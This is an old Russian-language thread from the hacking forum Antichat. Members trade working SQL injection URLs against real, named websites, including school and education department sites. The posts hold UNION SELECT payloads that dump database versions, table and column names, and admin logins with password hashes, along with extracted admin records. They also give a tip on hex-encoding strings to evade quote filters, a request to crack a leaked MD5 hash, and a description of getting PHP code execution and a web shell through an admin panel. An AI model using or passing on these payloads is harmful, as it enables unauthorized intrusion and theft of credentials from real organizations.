Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
26.08.2008, 07:37
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
|
|
|
26.08.2008, 09:11
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
SeNaP
http://www.tartanarmy.co.uk/news/news.php?id=-13+union+select+1,3,3,unhex(hex(version())),5,6/*
версия 4.
http://www.tartanarmy.co.uk/news/news.php?id=-13+union+select+1,3,3,unhex(hex(concat_ws(0x3a,use r,password))),5,6+from+mysql.user/*
рут..
http://www.theenemy.com/news.php?id=-13+union+select+1,2,version(),4,5,6,7,8,9,10,11/*
4 ver..
http://www.budd-pni.com/news.php?ID=-13+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24/*
Последний раз редактировалось sabe; 26.08.2008 в 09:22..
|
|
|
|
26.08.2008, 11:31
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
sabe, а что вот это "unhex(hex"  ? |
|
|
|
26.08.2008, 12:56
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
вот нашол SQL инж
http://www.eastbaythunder.com/news.php?id=-16+union+select+1,2,3,4,5,table_name,7+from+INFORM ATION_SCHEMA.TABLES+limit+19,1/* таблица "админ" , а как её вскрыть? :?
|
|
|
|
26.08.2008, 14:02
|
|
Участник форума
Регистрация: 18.08.2008
Сообщений: 159
Провел на форуме:
750247
Репутация:
92
|
|
Сообщение от SeNaP
вот нашол SQL инж
http://www.eastbaythunder.com/news.php?id=-16+union+select+1,2,3,4,5,table_name,7+from+INFORM ATION_SCHEMA.TABLES+limit+19,1/* таблица "админ" , а как её вскрыть? :?
http://www.eastbaythunder.com/news.php?id=-16+union+select+1,2,3,4,5,column_name,7+from+INFOR MATION_SCHEMA.columns+where table_name='admin'/*
Если фильтрует кавычки, то используй вместо 'admin'
0x61646d696e. Это тоже самое, но в hex.
Как вариант можешь использовать SIPT 4.0, она делает всю рутинную работу.
Вот что получилось выдрать с базы
Getting Data from table admin from database eastbayt_store
Fields admin_groups_id:admin_firstname:admin_lastname:adm in_password
[0]:1:Sandy and Keven:Torres:065b34a51dd6819e14c87d580055ac42:e7
[1]:2:Customer:Service:a619003120892efc8cf3a44c85982a ec:44
|
|
|
|
26.08.2008, 14:28
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Ух ты... Сайт какого-то департамента образования
Код:
http://www.dosakh.ru/index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11+from+mos_users--
admin:6672984060ab7eb061aa87cc089e761b (MD5)
расшифровать неполучилось(... Если кто сможет - отпишите
Идем далее:
Код:
http://www.dosakh.ru/index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat_ws(version(),0x3a,user(),0x3a,database()),6,7,8,9,10,11--
version() - 4.1.22
user() - dosakhru
database() - dosakhru@78.108.81.161
Зайдя на главную админки написано:
Разработка: Воробьев И.К.
Клева он сайты делает 
|
|
|
|
26.08.2008, 14:17
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
http://www.bscs.k12.mi.us/website/index.php?subpage_id=94
User:website@localhost
Version:4.1.20 (((
Dbname:website
|
|
|
|
26.08.2008, 14:35
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
4p3, чтот я не смог самостоятельно открыть таблицу admin
|
|
|
|
26.08.2008, 14:40
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
Смотри и учись юный падаван
065b34a51dd6819e14c87d580055ac42:e7- хэш админа нагел так
Код:
http://www.eastbaythunder.com/news.php?id=-16+union+select+1,2,3,4,5,admin_password,7+from+admin/*
Перебирая
Код:
http://www.eastbaythunder.com/news.php?id=-16+union+select+1,2,3,4,5,column_name,7+from+INFORMATION_SCHEMA.columns+where+table_name=0x61646d696e+limit+5,1/*
Вот и все там кстати было мыло админа. |
|
|
|
26.08.2008, 15:13
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Турпортал.... Еб..м и наслаждаемся!
http://www.argoturas.lt/index.php?lng=en&action=page&id=-1+union+select+concat(0x3a3a,user_login,0x3a3a,use r_password),null,null+from+sys_user+limit+0,1
http://www.argoturas.lt/admin/
В админке, через файл конфига есть возможность выполнения php кода. -> дописываем, шелим и тп...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид